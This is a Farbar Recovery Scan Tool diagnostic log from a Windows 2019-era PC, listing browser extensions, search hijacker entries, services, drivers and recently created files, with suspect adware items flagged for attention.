SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A3B40275-870B-498B-BD19-B5702E8B61A2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A810E43A-313B-4571-8D1D-6DEC89C6B1D7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9689D8D-DD63-4900-BD1D-9E6F8E7D26DF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9AFD5C7-DB69-4A9D-BF1A-8B33473351A4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AB73B2ED-F705-4656-9490-B2C6B2AEB6C6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AEBA8DD8-21D0-4DB6-A4F2-B4C5569260CA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AFD30DD4-F70E-4D36-BD50-FB5DA3AAEECF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B37AD013-C2D0-40F3-97D9-0472349E9C44} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B3D3A37C-4613-432E-8E3A-53E589157C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B6CA1B24-2418-4737-BB1A-6AB0CC0DF5AC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B71E823F-B4CC-4FB0-A8CC-DC505018DC1E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B9A6127D-16DE-481F-B9CA-4B397968F86A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA398AD4-309C-4915-9C6C-60140565F949} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA7DE47C-7957-4F39-85B5-BDADF2C1F23D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BF82F267-1D54-46D3-B76F-22D6A302F0EB} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BFE3BE80-727C-44AB-99DE-BAF4905AD5F9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C0095A98-BEAC-4C7D-89CD-23EDC7F1B0C1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C5FCA41F-794E-418D-B3AE-C5D2A9AB42A9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C6404912-B3FD-49D2-A88E-B88706C2E34A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CBE76AAC-7419-4CDE-98F3-48926A7E9121} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CC0BD598-A1C5-475E-AEB4-9A0CC3C53476} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CEDE0664-DEDC-4FA7-A393-3A2258C3D6A5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CFD8262B-801B-4471-B023-D1EA7C06C2B6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D0FAF6B0-BE3C-4C6D-B8BD-E307B77D2678} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D46AAFD7-49B7-4EDA-8081-F4ED3B3B5580} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E13E38A8-753A-4FD1-904A-066F681EDC1F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E6138BC0-A1E9-47D4-B000-FA1B4F043F92} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E8D0F6D5-572F-4F61-A09D-85D1CF0BA2FA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EBF29334-C208-4510-9CA2-4E7D84F02AB4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EF0BA1F2-5C7B-4FC4-B685-50C92BCD1FC4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F05B18BC-48EC-4676-A4EF-2B0779FBC7C8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F068E404-672E-429C-A601-117CA8E6F64B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F08DC883-0E75-4743-926F-07C2C076133F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {FBFB7078-3DAC-4B24-8CF6-2B36D1202F93} URL =
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard Company -> Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard Company -> Hewlett-Packard)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: 1j8n8vuz.default-1563958825578
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\GQD9zH3G.default\Profiles\GQD9zH3G.default [not found] <==== ATTENTION
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Firefox\Firefox\naweriweentcofise\Profiles\GQD9zH3G.default\Profiles\GQD9zH3G.default [not found] <==== ATTENTION
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\Profiles\1j8n8vuz.default-1563958825578 [2019-07-30]
FF Extension: (AdBlock) - C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\Profiles\1j8n8vuz.default-1563958825578\Extensions\jid1-NIfFY2CA8fy1tg@jetpack.xpi [2019-07-28]
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default [2019-04-15] <==== ATTENTION
FF user.js: detected! => C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\user.js [2017-01-09]
FF Homepage: Firefox\Firefox\Profiles\GQD9zH3G.default -> hxxp://www.searchinme.com/
FF NewTab: Firefox\Firefox\Profiles\GQD9zH3G.default -> hxxp://www.initialpage123.com/?z=248d5d062fbc8 ... 11&type=hp
FF Extension: (SimilarWeb) - C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-23] [Legacy] [not signed]
FF Extension: (HSearch) - C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-23] [not signed]
FF Extension: (FF Adr) - C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-16] [not signed]
FF Extension: (Avira Browser Safety) - C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\Extensions\abs@avira.com.xpi [2019-04-01]
FF Extension: (IObit Surfing Protection & Ads Removal) - C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\Extensions\ascsurfingprotectionnew@iobit.com.xpi [2016-10-18] [Legacy]
FF Extension: (Czech (CZ) Language Pack) - C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\Extensions\langpack-cs@firefox.mozilla.org.xpi [2017-05-16] [Legacy] [not signed]
FF SearchPlugin: C:\Users\Radim\AppData\Roaming\Firefox\Firefox\Profiles\GQD9zH3G.default\searchplugins\startsearch.xml [2017-05-16]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-07-09] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.2 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-06-11] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-06-11] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-06-11] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-07-09] (Adobe Inc. -> )
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google) [File not signed]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.66 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-04-29] (Internal - IntelÂ® Identity Protection Technology Software -> Intel Corporation) [File not signed]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-04-29] (Internal - IntelÂ® Identity Protection Technology Software -> Intel Corporation) [File not signed]
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-12-21] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2652530150-2383877666-4203637229-1007: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Radim\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-11-01] (Unity Technologies SF -> Unity Technologies ApS)
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - Chrome.exe
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc -> Google Inc.) <==== ATTENTION

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [239616 2014-08-04] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6797008 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [414976 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R2 BIT; C:\ProgramData\BIT\BIT.dll [1811968 2017-05-17] (TODO: <ĺ…¬ĺŹ¸ĺŤ>) [File not signed] <==== ATTENTION
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1443520 2016-04-04] (Disc Soft Ltd -> Disc Soft Ltd)
S3 HotSpotSrv; C:\Program Files (x86)\Hewlett-Packard\HP Wireless Hotspot\HotSpotSrv.exe [372920 2013-09-18] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [330136 2015-08-27] (Intel Corporation - pGFX -> Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [732160 2012-12-10] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [803872 2012-12-10] (IntelÂ® Trusted Connect Service -> Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131032 2014-04-29] (Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165336 2014-04-29] (Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation)
R2 LicCtrlService; C:\WINDOWS\runservice.exe [16384 2016-05-18] () [File not signed]
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2159424 2018-03-19] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3028808 2018-03-19] (Electronic Arts, Inc. -> Electronic Arts)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [327680 2014-04-29] (IDT, Inc.) [File not signed]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-05-14] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-05-14] (Microsoft Corporation -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 Accelerometer; C:\WINDOWS\system32\DRIVERS\Accelerometer.sys [43328 2012-08-21] (Hewlett-Packard Company -> Hewlett-Packard Company)
R3 amdkmdag; C:\WINDOWS\system32\DRIVERS\atikmdag.sys [12534784 2014-08-04] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\system32\DRIVERS\atikmpag.sys [619008 2014-08-04] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [37088 2014-08-05] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 aswArDisk; C:\WINDOWS\System32\drivers\aswArDisk.sys [37320 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\WINDOWS\System32\drivers\aswArPot.sys [209256 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\WINDOWS\System32\drivers\aswbidsdriver.sys [263224 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\WINDOWS\System32\drivers\aswbidsh.sys [206056 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\WINDOWS\System32\drivers\aswbuniv.sys [61688 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\WINDOWS\System32\drivers\aswHdsKe.sys [279336 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\WINDOWS\System32\drivers\aswKbd.sys [42504 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\WINDOWS\System32\drivers\aswMonFlt.sys [169112 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\WINDOWS\System32\drivers\aswRdr2.sys [112520 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\WINDOWS\System32\drivers\aswRvrt.sys [88160 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\WINDOWS\System32\drivers\aswSnx.sys [1030992 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\WINDOWS\System32\drivers\aswSP.sys [477288 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\WINDOWS\System32\drivers\aswStm.sys [225816 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\WINDOWS\System32\drivers\aswVmm.sys [387896 2019-07-25] (AVAST Software s.r.o. -> AVAST Software)
R2 atksgt; C:\WINDOWS\System32\DRIVERS\atksgt.sys [312480 2016-01-01] (Tages SA -> )
S3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [17624 2013-08-13] (Broadcom Corporation -> Windows (R) Win 7 DDK provider)
R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink -> CyberLink)
R3 clwvd; C:\WINDOWS\system32\DRIVERS\clwvd.sys [40944 2012-08-27] (CyberLink -> CyberLink Corporation)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-04-17] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-04-17] (Disc Soft Ltd -> Disc Soft Ltd)
S3 Hamachi; C:\WINDOWS\system32\DRIVERS\Hamdrv.sys [45680 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R0 hpdskflt; C:\WINDOWS\System32\DRIVERS\hpdskflt.sys [31040 2012-08-21] (Hewlett-Packard Company -> Hewlett-Packard Company)
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [27552 2016-03-15] (Martin Malik - REALiX -> REALiX(tm))
R2 lirsgt; C:\WINDOWS\System32\DRIVERS\lirsgt.sys [43168 2016-01-01] (Tages SA -> )
R3 netr28x; C:\WINDOWS\system32\DRIVERS\netr28x.sys [2505904 2013-12-04] (Mediatek Inc. -> Ralink Technology, Corp.)
R3 RTL8168; C:\WINDOWS\system32\DRIVERS\Rt630x64.sys [591360 2013-06-18] (Microsoft Windows -> Realtek )
S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [163644 2019-04-08] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
R3 SensorsServiceDriver; C:\WINDOWS\System32\drivers\WUDFRd.sys [226304 2014-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 SNP2UVC; C:\WINDOWS\system32\DRIVERS\snp2uvc.sys [2621128 2015-07-15] (Sonix Technology CO., LTD -> Sonix Tech. Co., Ltd.)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
R3 STHDA; C:\WINDOWS\system32\DRIVERS\stwrt64.sys [543744 2014-04-29] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
R3 t_mouse.sys; C:\WINDOWS\system32\DRIVERS\t_mouse.sys [6144 2013-04-09] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2014-08-16] (Apple, Inc.) [File not signed]
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46600 2017-05-14] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [274776 2017-05-14] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [117592 2017-05-14] (Microsoft Windows -> Microsoft Corporation)
S3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [31840 2016-03-23] (Hewlett-Packard Company -> HP)
R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31840 2016-03-23] (Hewlett-Packard Company -> HP)
R1 WiserIso; C:\WINDOWS\System32\Drivers\vcdrom.sys [25432 2016-12-27] (ć·±ĺśłĺ¸‚çŚ«ĺ“ç˝‘ç»śç§‘ćŠ€ĺŹ‘ĺ±•ćś‰é™ĺ…¬ĺŹ¸ -> ) <==== ATTENTION
S3 BtAudioBusSrv; \SystemRoot\System32\Drivers\BtAudioBus.sys [X]
S3 BthL2caScoIfSrv; \SystemRoot\System32\Drivers\BtL2caScoIf.sys [X]
S3 btUrbFilterDrv; \SystemRoot\System32\Drivers\IvtUrbBtFlt.sys [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
S1 JszipProtect; \??\C:\Program Files (x86)\Maoha\JiSuZip\JsZipProtect64.sys [X] <==== ATTENTION
S3 rtbth; \SystemRoot\System32\drivers\rtbth.sys [X]
S0 sptd; \SystemRoot\System32\Drivers\sptd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-07-30 10:35 - 2019-07-30 10:36 - 000053030 _____ C:\Users\Radim\Desktop\FRST.txt
2019-07-30 10:34 - 2019-07-30 10:35 - 000000000 ____D C:\FRST
2019-07-30 10:32 - 2019-07-30 10:32 - 002096128 _____ (Farbar) C:\Users\Radim\Desktop\FRST64.exe
2019-07-30 10:22 - 2019-07-30 10:22 - 000003166 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForRadim
2019-07-30 10:22 - 2019-07-30 10:22 - 000000352 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRadim.job
2019-07-30 09:40 - 2019-07-30 09:40 - 000013070 _____ C:\Users\Radim\Downloads\[CzT]Halloween_2018_CZ_.torrent
2019-07-30 00:43 - 2019-07-30 00:43 - 000000439 _____ C:\WINDOWS\system32\Drivers\etc\hosts.ics
2019-07-30 00:41 - 2011-09-12 18:05 - 000003917 _____ C:\WINDOWS\SysWOW64\atipblup.dat
2019-07-30 00:38 - 2019-07-30 00:39 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2019-07-30 00:37 - 2019-07-30 00:37 - 001953056 _____ (HP Inc.) C:\Users\Radim\Downloads\HPBRCULauncher.exe
2019-07-30 00:36 - 2019-07-30 00:36 - 000002386 _____ C:\Users\Public\Desktop\HP Wireless HotSpot.lnk
2019-07-30 00:35 - 2019-07-30 00:35 - 000000000 ____D C:\Users\Radim\AppData\Local\Downloaded Installations
2019-07-30 00:34 - 2019-07-30 00:34 - 000000000 ____D C:\Program Files\ATI Technologies
2019-07-30 00:34 - 2019-07-30 00:34 - 000000000 ____D C:\Program Files\ATI
2019-07-30 00:31 - 2019-07-30 00:31 - 006205512 _____ (Hewlett-Packard Company ) C:\Users\Radim\Downloads\sp64136.exe
2019-07-30 00:27 - 2019-07-30 00:29 - 299453032 _____ (InstallShield Software Corporation ) C:\Users\Radim\Downloads\sp69094.exe
2019-07-29 23:44 - 2019-07-30 09:34 - 000003870 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-07-29 23:42 - 2019-07-29 23:42 - 020891464 _____ (Piriform Software Ltd) C:\Users\Radim\Downloads\ccsetup560.exe
2019-07-29 23:36 - 2019-07-29 23:36 - 000001023 _____ C:\Users\Radim\Desktop\SpeedFan.lnk
2019-07-29 23:36 - 2019-07-29 23:36 - 000000045 _____ C:\WINDOWS\SysWOW64\initdebug.nfo
2019-07-29 23:36 - 2019-07-29 23:36 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan
2019-07-29 23:36 - 2019-07-29 23:36 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2019-07-29 23:35 - 2019-07-29 23:35 - 003086696 _____ C:\Users\Radim\Downloads\instspeedfan452(1).exe
2019-07-29 21:48 - 2019-07-29 21:48 - 000000451 _____ C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
2019-07-29 21:42 - 2019-05-30 21:55 - 000835688 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2019-07-29 21:42 - 2019-05-30 21:55 - 000179816 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2019-07-29 21:25 - 2019-07-30 09:34 - 000002990 _____ C:\WINDOWS\System32\Tasks\Synaptics TouchPad Enhancements
2019-07-29 21:06 - 2019-07-29 21:06 - 000000000 ____D C:\Program Files (x86)\HP
2019-07-29 21:05 - 2019-07-10 06:08 - 025754624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-07-29 21:05 - 2019-07-10 05:46 - 002909184 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-07-29 21:05 - 2019-07-10 05:44 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2019-07-29 21:05 - 2019-07-10 05:34 - 005775872 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2019-07-29 21:05 - 2019-07-10 05:33 - 000790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-07-29 21:05 - 2019-07-10 05:32 - 020291072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-07-29 21:05 - 2019-07-10 05:14 - 000496128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2019-07-29 21:05 - 2019-07-10 05:12 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2019-07-29 21:05 - 2019-07-10 05:11 - 002301952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-07-29 21:05 - 2019-07-10 05:11 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2019-07-29 21:05 - 2019-07-10 05:09 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2019-07-29 21:05 - 2019-07-10 05:09 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2019-07-29 21:05 - 2019-07-10 05:04 - 001033216 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2019-07-29 21:05 - 2019-07-10 05:04 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-07-29 21:05 - 2019-07-10 04:58 - 000262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2019-07-29 21:05 - 2019-07-10 04:56 - 000809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2019-07-29 21:05 - 2019-07-10 04:56 - 000728064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2019-07-29 21:05 - 2019-07-10 04:56 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2019-07-29 21:05 - 2019-07-10 04:53 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2019-07-29 21:05 - 2019-07-10 04:51 - 015389696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-07-29 21:05 - 2019-07-10 04:48 - 000168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2019-07-29 21:05 - 2019-07-10 04:48 - 000076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2019-07-29 21:05 - 2019-07-10 04:47 - 000128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2019-07-29 21:05 - 2019-07-10 04:46 - 000279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2019-07-29 21:05 - 2019-07-10 04:44 - 000880640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2019-07-29 21:05 - 2019-07-10 04:43 - 004858880 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-07-29 21:05 - 2019-07-10 04:42 - 004494848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2019-07-29 21:05 - 2019-07-10 04:40 - 000230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2019-07-29 21:05 - 2019-07-10 04:38 - 002058752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
